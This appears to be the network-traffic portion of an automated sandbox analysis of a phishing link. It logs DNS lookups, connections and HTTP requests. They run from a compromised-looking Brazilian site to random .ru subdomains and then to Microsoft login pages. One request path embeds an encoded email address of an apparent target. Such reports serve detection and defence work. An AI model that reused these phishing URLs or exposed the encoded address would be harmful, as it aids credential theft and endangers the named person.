Source: https://login.microsoftonline.com/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.microsoft365.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638672984146514294.ZjEwZDA1N2MtYTZmYi00NDZhLWI0NzgtMGIxMGVlODI5OTY4NGNlN2Q5ZDQtZDMwMS00ODk0LThkYjItMWExMDE0MTA1MjM2&ui_locales=en-US&mkt=en-US&client-request-id=6b3a9544-16e1-4c10-8c8f-7d6b57526a48&state=Ypfozi8mv6aRmqUgZE_yVtS1wqc0XgLjs0ptdC4L1QPH4aC54o2Gxy-XrB5ky_xwvI5UL78AaIMWLDQy-WrdUyHBOO4-7PRov81fy-YqatpKs0_h7wqdrLDLFln6S8AyuKiob1ErA5f3YOL39PwDHHBwpOIK9FRBlW6Vxc1PtFosC52Eebt8BrviFe1jkC6qHXhw6kKJdj3x6vKmdIzIGsdrsxMJUJVkc0IrDxRC3EIjYCrLEak5d7OPEAaIGI9jQ4sqSNIzVnI4QS_3kjbIOKvgM4uojPbPjqNwW8ggupl7Gl8hJPqwEng9BagR78UXsDPl10DaEIyV5NTFwiap5Q&x-client-SKU=ID_NET8_0&x-client-ver=7.5.1.0&sso_reload=trueHTTP Parser: No <meta name="copyright".. found
Source: unknownHTTPS traffic detected: 4.175.87.197:443 -> 192.168.2.16:49771 version: TLS 1.2
Source: chrome.exeMemory has grown: Private usage: 1MB later: 28MB
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: global trafficTCP traffic: 192.168.2.16:49769 -> 1.1.1.1:53
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 20.190.160.20
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: unknownTCP traffic detected without corresponding DNS query: 4.175.87.197
Source: global trafficHTTP traffic detected: GET /lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t HTTP/1.1Host: condominioanacarolina.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t HTTP/1.1Host: condominioanacarolina.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: condominioanacarolina.com.brConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Referer: http://condominioanacarolina.com.br/lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29tAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t HTTP/1.1Host: condominioanacarolina.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /lockeq/wtolwzl224moscrjiovolvgdhya1s0oym4bi4/a2VsbHkuc3dhbnNvbkBtb250cm9zZS1lbnYuY29t HTTP/1.1Host: condominioanacarolina.com.brConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficDNS traffic detected: DNS query: www.google.es
Source: global trafficDNS traffic detected: DNS query: condominioanacarolina.com.br
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: mrwa.ungonditc.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: l4t2chw8bqozm6lxxwcveyntznrcndgjvjlajqr2jr8aui2nnscya6iv.birsbunh.ru
Source: global trafficDNS traffic detected: DNS query: www.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: google.com
Source: global trafficDNS traffic detected: DNS query: yzpwvvyfpujhuri8bzaim9cqk9lqh7xhihnydfguqpg7hopl7b5677zv1g3.aeeouirl.ru
Source: global trafficDNS traffic detected: DNS query: excel.office.com
Source: global trafficDNS traffic detected: DNS query: www.microsoft365.com
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: global trafficDNS traffic detected: DNS query: identity.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: ox0itqwgw8xcz6dl6uphi82rj1nkyu7hpvbuvd7nsbrtptg6jesm1kiu.aeeouirl.ru
Source: global trafficDNS traffic detected: DNS query: www.outlook.com
Source: global trafficDNS traffic detected: DNS query: outlook.live.com
Source: global trafficDNS traffic detected: DNS query: assets.onestore.ms
Source: global trafficDNS traffic detected: DNS query: ajax.aspnetcdn.com
Source: global trafficDNS traffic detected: DNS query: c.s-microsoft.com
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 15 Nov 2024 20:12:36 GMTServer: ApacheContent-Length: 315Keep-Alive: timeout=5, max=99Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49851
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
